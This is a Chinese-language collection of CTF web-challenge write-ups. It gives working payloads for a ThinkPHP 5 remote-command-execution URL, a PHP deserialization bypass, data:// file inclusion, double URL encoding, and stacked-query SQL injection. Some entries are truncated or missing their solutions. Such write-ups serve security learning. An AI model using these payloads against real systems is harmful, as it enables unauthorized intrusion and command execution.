CTF（Web方向练习题）（持续更新）

1.Training-WWW-Robots
打开应用场景，如下：

网址后面添加/robots.txt 查看其中内容（robots协议也叫robots.txt（统一小写）是一种存放于网站根目录下的ASCII编码的文本文件），内容如下：

根据提示，访问/fl0g.PHP，得到flag值。
cyberpeace{b723b5eabd63b450baeff4d85829c3D6}
2.PHP2
题目描述为
搜索栏Http://111.200.241.244:49822/index.phps得到页面的源代码。

not allowed!"); exit(); } $_GET[id] = urldecode($_GET[id]); if($_GET[id] == "admin") { echo "Access granted!"; echo "Key: xxxxxxx"; } ?> Can you anthenticate to this WEBsite? 

由PHP源代码可以知道，主要解析Access granted!之前的内容，
$_GET[id] = urldecode($_GET[id]); 会对传入的id参数内容，进行一次urlcode().

if($_GET[id] == "admin") 

判断获取的id是否为admin，如果是，则可以获取flag。
在这里，我们需要知道的是，需要从payload读取id = admin，会对s进行两次url解码。第一次admin进行url编码后为%61%64%6d%69%6e。第二次admin = %2561dmin。得到flag为 cyberpeace{f8570244030b4be15bd0639161608641}。url编码表如下：

3.unserialize3

4.XTCTF(代码审计)

 class Demo {     private $file = 'index.php';    public function __construct($file) {         $this->file = $file;     }    function __destruct() {         echo @highlight_file($this->file, true);     }    function __wakeup() {         if ($this->file != 'index.php') {             //the secret is in the fl4g.php            $this->file = 'index.php';         }     } }if (isset($_GET['var'])) {     $var = base64_decode($_GET['var']);     if (preg_match('/[oc]:\d+:/i', $var)) {         die('stop hacking!');     } else {        @unserialize($var);     } } else {     highlight_file("index.php"); } ?>

推测为PHP反序列化方向的问题

 class Demo {     private $file = 'index.php';    public function __construct($file) {         $this->file = $file;     }    function __destruct() {         echo @highlight_file($this->file, true);     }    function __wakeup() {         if ($this->file != 'index.php') {             //the secret is in the fl4g.php            $this->file = 'index.php';         }     } }        $s=new Demo('fl4g.php');        $s=serialize($s);        echo $s;        $s = str_replace('O:4', 'O:+4',$s); // 绕过正则        $s = str_replace(':1:', ':2:' ,$s);// 绕过wakeup        echo base64_encode($s);?>

得出test.php的运行结果：O：4：“Demo”：1：{s：10：“Demofile”;s：8：“fl4g.php”;}TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==
payload =http://111.200.241.244:61945/?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ== 得出flag
5.php_rce
ThinkPHP 5漏洞
漏洞原理：程序未对控制器进行过滤，导致攻击者可以用斜杠（\）调用任意方法。
利用system函数远程命令执行：/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

其中，vars[1][]=(linux指令)

在url后面添加/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

根据Linux命令，ls命令用于显示文件目录列表
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /
可以看到文件目录中有flag，因此进入flag的目录下。111.200.241.244:50037/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /flag再利用linux中的cat命令查看整个文件。http://111.200.241.244:50037/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag
6.Web_php_include

show_source(__FILE__);echo $_GET['hello'];$page=$_GET['page'];while (strstr($page, "php://")) #{    $page=str_replace("php://", "", $page);}include($page);#//文件包含，可以执行page变量中的代码。?>

include（$page）表示题目主要考察文件包含漏洞。
该题目主要考察PHP伪协议，在该博客中有对PHP伪协议详细的介绍，https://www.cnblogs.com/weak-chicken/p/12275806.html。
在上述代码可以看到while中设置strstr（）函数，该函数对大小写不敏感，所以要想使用php协议，要改成大写。

在url后面添加?page=data://text/plain,
后面的PHP代码将会被实现，"ls"和"dir"均可用于查看当前目录文件。
可以看到，flag值在fl4GISisish3r3.php中。采用cat命令查看可能存在flag值的文件。
PHP源代码不显示内容，采用页面源代码。

7.supersqli

判断网站是否存在注入情况：https://www.cnblogs.com/SCHAOGES/p/10889654.html
可能存在字符注入。

1';show databases;#展示所有的数据库。

1';use supersqli; #使用该数据库

1';show tables; #展示该数据库下所有的表

可以看出得到两个表，1919810931114514和Words。
因为我们无法确认哪个表中有flag，因此我们需要查看两个表中的列名。

1'; show columns from `words`; #查看word表的值，注意这里的反引号。

没有flag有关的列值因此，查看另一个表。

1'; show columns from `1919810931114514`;

此时，我们需要思考如何回显flag的值。
在之前的测试中，发现网页会自动过滤select、insert等字段

1';alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);

1' or '1'='1

7.ics-06
云平台报表中心收集了设备管理基础服务的数据，但是数据被删除了，只有一处留下了入侵者的痕迹

来源地址：https://blog.csdn.net/m0_56010012/article/details/122656326